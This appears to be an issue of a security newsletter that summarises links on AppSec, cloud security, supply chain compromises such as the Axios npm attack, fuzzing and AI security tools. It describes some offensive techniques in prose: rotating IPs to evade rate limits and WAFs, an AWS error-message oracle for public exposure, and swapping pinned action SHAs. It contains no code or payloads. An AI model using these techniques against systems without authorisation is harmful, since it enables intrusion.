🫶 Long Career, Long Friendships

This week I was reflecting a bit after BSidesSF and RSAC about how careers are long.

I remember attending conferences when I first started in security and being intimidated by how it was crowded and full of strangers.

This year, there were still many strangers not yet friends, but now I got to catch up with many former colleagues and friends I’ve known for years. Some for a decade 👴 

It feels nice knowing we’re all working together in our own ways, at different companies, to make the world a little bit safer.

Also, just wanted to share a few thoughts:

• It’s OK if you don’t know people at an event or conference. 98% of the time if you go up and chat with a stranger it goes great, or at least fine.

  • When I’m nervous at events, I like to think about how, just by both of us being at a security event, I have a vast amount of shared experience and context with anyone there.

• If every event you just meet a handful of people, that’s going to compound event on event, year on year. Soon you’ll likely know at least a few people at most events.

Anywho, if you attended, I hope you had a great time and made some friends, and didn’t just repeat “AI” until a VC materialized and dumped money on you.

P.S. Dan Guido kindly turned his [un]prompted talk into a tl;dr sec guest post. It’s excellent, highly recommend.
👉️ How we made Trail of Bits AI-native (so far) 👈️ 

Sponsor

📣 Free tool: instant visibility into your Claude Desktop deployment

Employees aren't waiting for approval. Claude Desktop is getting deployed with MCP servers, OAuth connectors, CoWork scheduled tasks, and browser-control extensions your security team never reviewed.

Our Head of Security, Ed Merrett, built a lightweight, read-only audit tool to give you instant visibility. One command surfaces everything: installed extensions and whether they're signed, MCP server configs, dangling env variables, OAuth tokens, scheduled tasks, org-deployed plugins, and runtime state.

p.s. If you’re looking for more help with securing the Claude ecosystem, visit harmonic.security to check out our other free resources!

👉 Audit your Claude setup 👈

AppSec

portswigger/ip-rotate
By Portswigger: An extension for Burp Suite that uses AWS API Gateway to rotate your IP on every request, helping bypass IP-based rate limiting, bruteforce protections, and WAF blocks.

Passkeys are Your New Best Friend
Google's Harsh Lal explains how passkeys use asymmetric cryptography to replace passwords, where a private key stored on your device signs authentication challenges while the public key on the server verifies them, making them phishing-resistant through domain binding and useless if servers are breached. Nice brief overview of why passkeys are safer than passwords, signing in across devices, FAQ of security concerns, and risks: sync account hijacking (mitigated by requiring the old device's screen lock) and social engineering attacks requiring physical proximity

A year of open source vulnerability trends: CVEs, advisories, and malware
GitHub's Jonathan Evans analyzes the 4,101 reviewed advisories GitHub published in 2025, the fewest since 2021, but this reflects a reduction in backfilling older vulnerabilities rather than fewer new discoveries- newly reported vulnerabilities actually increased 19% year-over-year. The data shows cross-site scripting remains the top vulnerability type; resource exhaustion, unsafe deserialization, and SSRF saw significant increases. Advisories without any CWE dropped 85% due to improved tagging. GitHub's malware advisory publications surged 69% to 7,197 (driven by campaigns like SHA1-Hulud). The GitHub CNA published 35% more CVE records (2,903 total) with 679 new organizations requesting CVE IDs. “We saw 10 to 16% growth every quarter. If this trend continues, GitHub will publish over 50% more CVEs in 2026.”

💡 Frontier models are getting so much better at finding vulnerabilities + much more code is being written → 2026 is for sure going to be a record breaking year for CVEs, the only question is by how much. People are (in my opinion, correctly) talking about an upcoming “vulnpocalypse." 😅 

Sponsor

📣 Webinar: Executive Impersonation and Modern Phishing Tactics

Executive impersonation attacks pressure employees with urgency, authority, and high-stakes requests. Because they rely on social engineering instead of obvious malware, they often slip past traditional email defenses. Join Sublime Security for a live webinar on April 8 to break down how these attacks work, review real-world patterns, and learn practical ways security teams can detect and stop impersonation attempts earlier.

👉 Register 👈

Andrew Becherer is a sharp dude, and gave an excellent talk at the Decibel event Daniel Miessler and I co-hosted during RSA. He definitely has perspective worth listening to.

Cloud Security

Reunifying the Cloud: Introducing Aurelian for Multi-Cloud Security Testing
Praetorian's Aarushi Dwivedi et al have released Aurelian, an open-source Go-based multi-cloud security framework that unifies reconnaissance, secrets discovery, and IAM analysis across AWS, Azure, and GCP. Aurelian evaluates resource policies using real IAM policy evaluation logic (not just flag checks), integrates with Titus for secrets scanning with live credential validation via API calls, and maps privilege escalation paths to Neo4j for Cypher-based querying of multi-hop attack chains.

Don’t expose yourself in public - let AWS error messages do it for you
Plerion’s Daniel Grzelak describes how AWS recently rolled out friendly IAM error messages that inadvertently created a simple oracle for detecting publicly exposed resources: assume a role with a deny-all session policy, make a request, and if the error says "explicit deny in a session policy," the resource policy would have allowed it, confirming public exposure.

💡 The contents of my friend Daniel's posts have great security advice, and the titles have good life advice.

Supply Chain

TeamPCP Supply Chain Campaign
Nice round-up landing page by Rami McCarthy.

TeamPCP Supply Chain Campaign: A March 2026 Retrospective
Great overview by OpenSourceMalware’s Jenn Gile on how TeamPCP executed a cascading multi-phase supply chain attack in March 2026, leveraging a single unrevoked credential stolen from Trivy's CI pipeline to compromise several ecosystems (Aqua Security, npm, LiteLLM/PyPI, Checkmarx, and Telnyx), harvesting CI/CD secrets at each stage to fund the next, while also deploying a geotargeted filesystem wiper against Iranian infrastructure.

💡 I met Jenn at the tl;dr sec community event before BSidesSF, she seems super sharp and nice 🙂 

Supply Chain Attack on Axios Pulls Malicious Dependency from npm
Socket describes a supply chain attack that compromised Axios, one of the most widely used HTTP clients in the JavaScript ecosystem (~100M weekly downloads), by injecting the malicious dependency [email protected], which was published minutes before the poisoned Axios releases. The release appeared outside the normal Axios workflow, only two malicious versions were published, and only one line was added to package.json (the malicious dependency)- small, targeted changes being less likely to raise suspicion.

💡 *Takes a long drag from my cigarette* Another day, another NPM compromise.

The Comforting Lie Of SHA Pinning
Aiden Vaines describes a subtlety of how GitHub scopes SHA hash references when you’re trying to pin a GitHub Action to a commit SHA. Basically, if you have a repo using the GitHub Action avaines/gh_action@<SHA> , and an attacker forks that action, adds malicious code, and submits a PR to the target repo that only changes the Action’s SHA reference, it will look like avaines/gh_action@<BAD_SHA> (same owner/repo name, only the SHA has changed, despite this version coming from a different GitHub user). “The result is that a pull request can replace a pinned, trusted action with attacker-controlled code without changing the apparent repository reference.”

Chainguard’s Billy Lynch wrote about this in 2023: What the fork? Imposter commits in GitHub Actions and CI/CD. Great write-up.

Securing the open source supply chain across GitHub
GitHub's Zachary Steindler discusses prevention steps you can take today, plus a look at the security capabilities GitHub is working on. He recommends enabling CodeQL to scan Actions workflows for security issues, avoiding pull_request_target triggers, pinning third-party Actions to full commit SHAs, and using OpenID Connect tokens with trusted publishing instead of secrets. GitHub scans all 30,000+ daily npm package publishes for malware and is accelerating their Actions security roadmap in response to attacks like Shai-Hulud, while working with OpenSSF to expand trusted publishing support across npm, PyPI, NuGet, RubyGems, and Crates.

What's coming to our GitHub Actions 2026 security roadmap
GitHub's Greg Ose describes their 2026 roadmap to secure GitHub Actions against supply chain attacks through: introducing workflow-level dependency locking (similar to Go's go.mod/go.sum) that pins all direct and transitive dependencies with commit SHAs (future: immutable releases), implementing policy-driven execution protections via rulesets that control who can trigger workflows and which events are allowed (with evaluate mode for safe rollout), and adding scoped secrets that bind credentials to specific repositories, branches, environments, or trusted reusable workflows.

GitHub is also building the Actions Data Stream for near real-time execution telemetry to S3/Azure Event Hub and a native Layer 7 egress firewall for GitHub-hosted runners that operates outside the runner VM with monitor and enforce modes, treating CI/CD infrastructure as critical infrastructure with enforceable network boundaries.

💡 These seem like excellent, thoughtful improvements. Love the push towards better visibility, security controls, and secure by default. Hats off to the GitHub team for these initiatives. Unfortunately the timeline is 3-6 months, though I’d rather them build it right than poorly.

Red Team

googleprojectzero/Jackalope
Binary, coverage-guided fuzzer for Windows, macOS, Linux and Android. Built on TinyInst for binary instrumentation, supports both file and shared memory sample delivery.

On the Effectiveness of Mutational Grammar Fuzzing
Mutational grammar fuzzing is a type of fuzzing that uses a predefined grammar to describe the structure of the samples (e.g. input string or file) so that when a sample gets mutated, the resulting samples still adhere to the grammar rules. Google Project Zero’s Ivan Fratric describes two key flaws in mutational coverage-guided grammar fuzzing: 1) more coverage doesn’t mean more bugs, you need to test the right code patterns (e.g. functions need to be called in a certain order, or the result from one function is used as in input to another function), and 2) mutational fuzzing produces highly similar samples due to its greedy nature of saving slightly-modified samples that trigger new coverage.

To address these issues, Ivan proposes a technique in Jackalope where the fuzzing worker spends half of the time creating a fully independent corpus generated from scratch and half of the time working on a larger corpus that also incorporates interesting samples (as measured by the coverage) from previous workers.

It's More Than Saying No
Zoom’s Head of Assurance Andy Grant describes what to do when leadership asks your offensive security team to do work it was never designed for. Andy argues that offensive security teams lose effectiveness when they accept misaligned work like QA support, rushed pentests, or control validation, which disrupts the long exploration periods needed for discovering unknown unknowns through intuition-driven research.

Rather than saying no to requests, proactively engage with leadership to anticipate concerns, start investigating before formal requests arrive, and reframe incoming work to align with the team's adversarial research model, for example, reframing "can you test X before release?" into deeper investigations of trust boundaries and systemic risk.

AI + Security

[un]prompted 2026 YouTube Playlist
The talk recordings have (mostly) been published. 65 talks at the forefront of AI + security. The final 9 will be uploaded soon.

RSA 2026 Startup Landscape
Jake Epstein mapped every cybersecurity startup at RSAC 2026 (322 companies) into 18 categories, including Agent Security / Non Human Identity, developer security, AI SOC, AI pen testing, data pipelines, human risk, and more. Neat visualization.

VulnVibes: Building an AI Agent That Reasons Across Microservices to Find Real Vulnerabilities
Anshuman Bhartiya announces VulnVibes, an AI-powered agent that analyzes Pull Requests for vulnerabilities by reasoning across multiple repositories in an organization, which is useful in microservice architectures. It searches across your entire GitHub organization to understand your architecture, verify what security controls actually exist, and determine if a suspicious code change is a real vulnerability. VulnVibes works in two stages: first threat modeling the PR diff to identify security-relevant changes, then performing cross-repo investigation by reading infrastructure configs (Docker Compose, nginx), checking for security controls, and following vulnerability-specific investigation playbooks.

Anshuman walks through running VulnVibes against microvibes-lab (a test org with auth-service, doc-api, frontend-app, and infra-ops repos), in which it correctly identified an SSRF vulnerability by tracing the attack path across three repos to confirm a flat Docker network and lack of WAF protection, made a nuanced call that a permissive CORS config was a false positive after verifying the codebase only uses header-based auth, and appropriately ignored a safe JWT refactoring.

Misc

Claude Code source map leak

• Anthropic shipped a source map file in the Claude Code npm package, exposing the full unobfuscated TypeScript source (~1,900 files, 512K+ lines). It’s also suspiciously close to April Fools Day 🤔 Maybe it’s real though? (Thariq tweet)

• Claude Code Hidden Features - 89 feature flags, unreleased autonomous agents, companion pets, anti-distillation systems, and more — extracted from 1,809 source files.

• nblintao/awesome-claude-code-postleak-insights

• instructkr/claw-code - Someone took Claude Code leak, then used Codex to port the core features to Python from scratch, and then ported it to Rust.

• Theo’s video - I think he’s overly negative and I don’t agree with all his points, but it has some reasonable context.

Misc

• Dissecting the Bars While Rapping - Harry Mack dissects what he’s doing in his rap (structurally, setting up rhymes), while rapping about it. Insane 🤯 

• 404 Media - The company WebinarTV is secretly scanning the Internet for Zoom meeting links, recording the calls, and turning them into AI-generated podcasts for profit.

• Can it Resolve DOOM? Game Engine in 2,000 DNS Records - As DNS TXT records can store arbitrary text, Adam Rice was able compress and play DOOM from 1,966 TXT records on a single CloudFlare Pro DNS zone. 😂 

• Apple says no one using Lockdown Mode has been hacked with spyware in the four years since it’s been launched. This is impressive, and a great example of eliminating vulnerability classes/raising the security bar at scale 🤘 

• Matt Rife exposes Tik Tok shadow ban on standup comedy

• Gabor Mate to Hasan Minaj - Kids Speak Where It’s Safe 😭 

• Alex Hormozi - How to Win With AI in 2026

• Good Work - Why fun tech jobs went extinct

• 7 months underwater on a nuclear submarine - Fascinating!

Politics / Privacy

• Iran-linked hackers breach FBI director's personal email, publish photos and documents

• Iran built a vast camera network to control dissent. Israel turned it into a targeting tool - Allegedly Israel hijacked Iran’s street cameras in order to successfully track and target Iran’s supreme leader. “Experts say advances in AI have allowed militaries to overcome a critical hurdle in weaponizing hacked footage: sifting through huge amounts of video to identify people, vehicles, and other targets.”

• Using a VPN May Subject You to NSA Spying - Because VPNs obscure a user’s true location, and because intelligence agencies presume communications of unknown origin are foreign, that may give the NSA the authority to intercept the communication without a warrant.

• EU Disinfo Lab - Disinfo Update 12/11/2025 - I haven’t come across this lab before so I’m not sure about the trustworthiness, but it has some interesting links around topics including: the X algorithm amplifying right-wing and extreme content, Meta’s profits being tied to scam ads, Russia recruiting fighters from other companies, Israel paying US influencers to boost its image, AI chatbots repeating Russian propaganda, and more.

✉️ Wrapping Up

Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏

Thanks for reading!

Cheers,
Clint

P.S. Feel free to connect with me on LinkedIn 👋